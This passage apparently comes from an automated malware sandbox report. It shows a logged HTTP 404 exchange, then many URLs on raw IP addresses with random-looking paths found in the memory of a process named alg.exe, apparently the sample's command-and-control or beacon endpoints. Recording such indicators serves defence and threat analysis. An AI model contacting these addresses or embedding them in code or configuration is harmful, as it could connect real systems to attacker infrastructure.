64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:27:08 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
                Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/fkcgbfiiatbbgsse
                Source: alg.exe, 00000010.00000003.2946550482.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2943510653.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/rfuetphopheyd5e
                Source: alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/xgyulldvremqd
                Source: alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/xgyulldvremqdsJiM4
                Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/fkcgbfiiatbbgsseZ
                Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/
                Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/95Z4
                Source: alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/E6
                Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/I6
                Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/e6
                Source: alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/hmsaqgigfaxqle
                Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/tpnpycqre
                Source: alg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/hmsaqgigfaxqleZ
                Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/tpnpycqre
                Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/gcfjbafgheaeckZ
                Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/0
                Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/1
                Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/U6
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/dnuv
                Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2646796580.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2641170995.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/hij
                Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2646796580.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2641170995.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/hijttingsfia4
                Source: alg.exe, 00000010.00000003.1785132829.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/idnuv
                Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/idnuvngs
                Source: alg.exe, 00000010.00000003.2469063610.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jntykoegrmymca
                Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/luqhjxxa
                Source: alg.exe, 00000010.00000003.1625043610.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/luqhjxxa6
                Source: alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ngs
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/p
                Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/idnuvL
                Source: alg.exe, 00000010.00000003.1634866335.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1625043610.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/luqhjxxaeight
                Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2758575207.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/
                Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/P
                Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2707611078.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2838553167.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2821712135.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2869356422.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2847946283.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2787015500.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2859107398.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2813010985.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2768042043.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2795361454.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/agwyffystye
                Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2838553167.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2821712135.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2869356422.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2847946283.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2767058198.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2787015500.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2859107398.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2813010985.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2768042043.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2795361454.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2759167385.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/agwyffystyegslio4
                Source: alg.exe, 00000010.00000003.2415414669.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/aoayitmlcu
                Source: alg.exe, 00000010.00000003.2415414669.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/aoayitmlcurkm
                Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/bulntsganndw5e
                Source: alg.exe, 00000010.00000003.2494888019.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/cqrtypmijgihv
                Source: alg.exe, 00000010.00000003.2494888019.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/cqrtypmijgihvRiU4
                Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/dgltjhlriyylmg
                Source: alg.exe, 00000010.00000003.2946550482.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2943510653.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2990288731.00000000005D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/gmkfkxvhjjwggemmie
                Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/m
                Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/nhxpdndgorrZ
                Source: alg.exe, 00000010.00000003.2750711951.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/
                Source: alg.exe, 00000010.00000003.3027828882.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3029299018.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3010619985.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3008704165.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.3026100768.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/exygmnocmwksymmie
                Source: alg.exe, 00000010.00000003.2506262657.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2504973605.00000000005D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/vuf
                Source: alg.exe, 00000010.00000003.2506262657.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2504973605.00000000005D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/vufngsqi
                Source: alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/H
                Source: alg.exe, 00000010.00000003.2044644305.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/U6
                Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/bh
                Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/bh.T
                Source: alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/mr
                Source: alg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/mrttingsoih4
                Source: alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/xllckl
                Source: alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/xllcklc8e8c945i64(
                Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/bhg
                Source: alg.exe, 00000010.00000003.2028087857.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/hckdbdnsiwdW
                Source: alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/byhbnbikqcomemw
                Source: alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/byhbnbikqcomemwsqi
                Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/
                Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/lio4
                Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/p
                Source: alg.exe, 00000010.00000003.2093566744.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/tpndpotkaatb
                Source: alg.exe, 00000010.00000003.2750049889.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2707611078.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2739925848.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2703464920.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2691370453.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2718776557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2729255507.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/rbpibulhoasascdr
                Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/
                Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/wnele
                Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/wneleRiU4
                Source: alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/wnelecid4
                Source: alg.exe, 00000010.00000003.2453121130.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/xsnbcmvbhjayqro
                Source: alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/
                Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/I6
                Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/ekxop
                Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2623426978.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/fiarjsoopiyhm
                Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2623426978.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/fiarjsoopiyhmRiU4
                Source: alg.exe, 00000010.00000003.2622502401.00000000005D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/fiarjsoopiyhmsqi
                Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/vekxop
                Source: alg.exe, 00000010.00000003.2079470414.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/vekxopatb
                Source: alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/vekxopngs
                Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200:80/vekxop
                Source: alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
                Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/1
                Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/1p
                Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/1q6
                Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/1s
                Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/55
                Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/e6
                Source: alg.exe, 00000010.00000003.1644399119.0000000000576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/rwebgnmbtiq
